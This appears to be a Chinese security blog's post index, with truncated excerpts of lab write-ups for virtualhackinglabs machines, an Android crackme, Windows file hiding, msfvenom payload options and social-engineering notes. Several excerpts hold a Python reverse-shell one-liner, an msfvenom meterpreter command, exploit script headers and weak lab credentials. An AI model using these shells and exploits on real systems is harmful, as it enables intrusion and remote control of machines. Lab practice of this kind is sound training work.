- 博客(147)
- 资源 (2)
- 收藏
- 关注
原创 安卓逆向——AliCrackme_1.apk
解法一:随便输入一段数字DDMS抓取到的数据enPassword应该是我们刚才输入的字符串刚才输入的:84848585enPassword:弓门弓门弓义弓义pw应该是正确的密码那么我们输入0123456789输入:0123456789enPassword:丸么广亡门义之尸弓己pw:义弓么丸广之也就是说义 对应 5弓 对应 8么 对应 1丸 对应 0广 对应 2之 对应 6正确密码是:581026解法二:先用Android Killer反编译在Notep
2021-12-18 19:00:03
4156
原创 windows内网
一丶文件隐藏1.使⽤Attrib +s +a +h +r命令就是把原本的⽂件夹增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐藏⽂件属性attrib +s +a +h +r c:\test2.系统⽂件夹图标1.建⼀个⽂件夹,假设叫 “我的电脑”。2.然后把要存放的⽂件放进⾥⾯。3.给⽂件夹重新命名为:“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”4.确定后你会发现⽂件夹变成我的电脑的图标,且打开它后进⼊的也是我的电脑。如何打开这个⽂件夹:我们
2021-09-14 23:11:47
382
原创 Payload笔记
一.payload生成msf:–p (- -payload-options)添加载荷payload。–l查看所有payload encoder nops。–f (- -help-formats)输出文件格式。–e编码免杀。–a (- -platform – -help-platforms)选择架构平台x86 | x64 | x86_64–o文件输出。–s生成payload的最大长度,就是文件大小。–b避免使用的字符 例如:不使用 ‘\0f’。–i编码次数。–c添
2021-09-13 21:36:48
2488
原创 社会工程学笔记
一.社会工程学流程:1.信息收集(获得目标的相关信息)2.分析信息并给出目标画像(找到目标的性格特征和社会属性特征以寻找弱点)3.初次接触目标并获得联系渠道(相当于拿一个shell)4.获得目标的信任并尝试扩大行为权限(相当于提权)5.长时间维持目标信任并保持长时间沟通渠道畅通(相当于权限维持)6.根据需求适当扩大以目标为中心的社交链的交互(相当于横向移动,只不过是在目标的社交圈中进行横向)7.结束后隐藏痕迹学习:需要学习社会学、心理学、行为经济学、舆论传播学、博弈论等二、情报分析视觉情
2021-09-12 22:03:44
494
原创 信息收集笔记
一.基本的红队测试流程介绍1.接到项目合同并制定相应计划2.准备相应的工具和材料3.做第一次信息收集4.做漏洞扫描或攻击面测试5.针对突出的攻击面做具体的渗透6.进入环境之后的第二次信息收集7.提升权限8.维持权限9.寻找扩大攻击面的渠道10.清理攻击痕迹11.编写报告二.信息收集的基本要素1.降低被发现的可能,提高隐蔽性2.根据目标的特性进行信息收集三.被动信息收集查询被人已经收集到的结果1.第三方的信息收集机构或平台已经收集到目标的信息2.第三方的信息收集机构或平台将
2021-09-12 20:50:52
329
原创 内网渗透1
目标服务器:192.168.x.120192.168.x.121192.168.x.122121开启了80端口,访问发现是要上传.doc文件,写一个Office宏来get shell1.首先用msf生成payloadmsfvenom -p windows/meterpreter/reverse_http LHOST=192.168.X.Y LPORT=8080 -f csharp2.对生成的payload进行编码using System;using System.Collection
2021-03-14 22:57:08
735
3
原创 virtualhackinglabs靶机 Jennifer 10.12.2.146
wampp: xampp密码好像没啥用啊访问xammp和phpmyadmin都不需要密码
2020-11-30 17:57:10
909
原创 virtualhackinglabs靶机 HELPDESK 10.12.1.11
有一个目录scphelpdesk:helpdesk1234321
2020-11-22 17:29:00
969
原创 virtualhackinglabs靶机 Mon01 10.12.2.241
https://github.com/ruthvikvegunta/nagiosxi_rce-to-root/blob/master/nagiosxi.py
2020-11-11 13:56:46
504
原创 virtualhackinglabs靶机 websrv01 10.12.2.243
https://github.com/g0rx/Drupal-SA-CORE-2019-003/blob/master/cve-2019-6340.pysettings.php files found: .
2020-11-10 19:38:47
607
原创 virtualhackinglabs靶机 GRAPHS01 10.12.2.245
漏洞就在脸上了https://github.com/mhaskar/CVE-2020-8813为啥用不了呢
2020-11-09 21:29:20
743
原创 virtualhackinglabs靶机 WINAS01 10.12.1.136
https://github.com/ruthvikvegunta/XAMPP-WebDAV-Exploit/blob/master/webdav_exploit.pyhttps://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe
2020-10-31 15:21:13
911
原创 virtualhackinglabs靶机 CMS01 10.12.1.177
#!/usr/bin/pythonfrom __future__ import print_functionimport requestsimport sysimport reimport argparseimport base64import osimport randomimport timetry: # Python 2.6-2.7 from HTMLParser import HTMLParserexcept ImportError: # Python 3 ...
2020-10-24 20:08:47
1325
原创 virtualhackinglabs靶机 BREEZE 10.12.1.124
#!/usr/bin/pythonprint "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"#Author website: www.tulpa-security.com#Author twitter: @tulpa_security#Exploit will land you NT AUTHORITY\SYSTE...
2020-10-24 14:46:05
793
aaron
#!/usr/bin/env python# Exploit Title: HttpFileServer 2.3.x Remote Command Execution# Google Dork: intext:"httpfileserver 2.3"# Date: 04-01-2016# Remote: Yes# Exploit Author: Avinash Kumar Thapa aka "-Acid"# Vendor Homepage: http://rejetto.com/...
2020-10-22 17:57:20
729
1
原创 virtualhackinglabs靶机 John 10.12.1.83
第一种:ms17-010第二种:ms08-067cve2019-0708好像也可以利用懒得写了
2020-10-22 15:24:45
316
原创 virtualhackinglabs靶机 ANTHONY 10.12.1.113
两种方法第一种方法(ms17-010)得到了NAS的凭证第二中方法
2020-10-19 22:09:05
543
原创 virtualhackinglabs靶机 PBX01 10.12.1.117
弱密码admin:adminpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'拿w..
2020-10-19 11:39:22
569
原创 virtualhackinglabs靶机 FW01 10.12.1.200
需要密码admin:admin弱密码猜解成功有漏洞脚本地址验证成功得到webshell直接切换用户root:root弱密码得到权限
2020-10-18 20:17:18
519
原创 virtualhackinglabs靶机 RTR-VHL-01 10.12.2.240
搜一下版本漏洞漏洞脚本地址应该算做完了吧官网的最后一个提示是在FTP中查看key.txt文件就算做完了吧这台机器好没意思
2020-10-18 19:42:37
484
原创 virtualhackinglabs靶机 NATURAL 10.12.1.77
80端口找到文件上传上传.php文件需要抓包修改一下参数就可以绕过了得到webshell/binbackdoor很可疑下载到本地分析看了半天还是不会提权
2020-10-18 15:47:29
853
原创 virtualhackinglabs靶机 Core 10.12.1.160
tomcat:s3cret直接登录进来了接下来上传文件拿到webshell现在考虑提权的问题linpeas.sh跑了一下发现/usr/lib/pt_chown —> GNU_glibc_2.1/2.1.1_-6(08-1999)利用失败利用失败
2020-10-18 14:19:23
647
原创 virtualhackinglabs靶机 DOLPHIN 10.12.1.58
VHL提示了是dolphin的RCE40756.py完成之前卡在web-dev卡了好久下把那个往后放一放先刷别的靶机
2020-10-17 19:57:01
913
原创 virtualhackinglabs靶机 VPS1723 10.12.1.53
ftp有远程命令执行漏洞脚本python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'执行命令..
2020-10-17 16:58:31
820
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人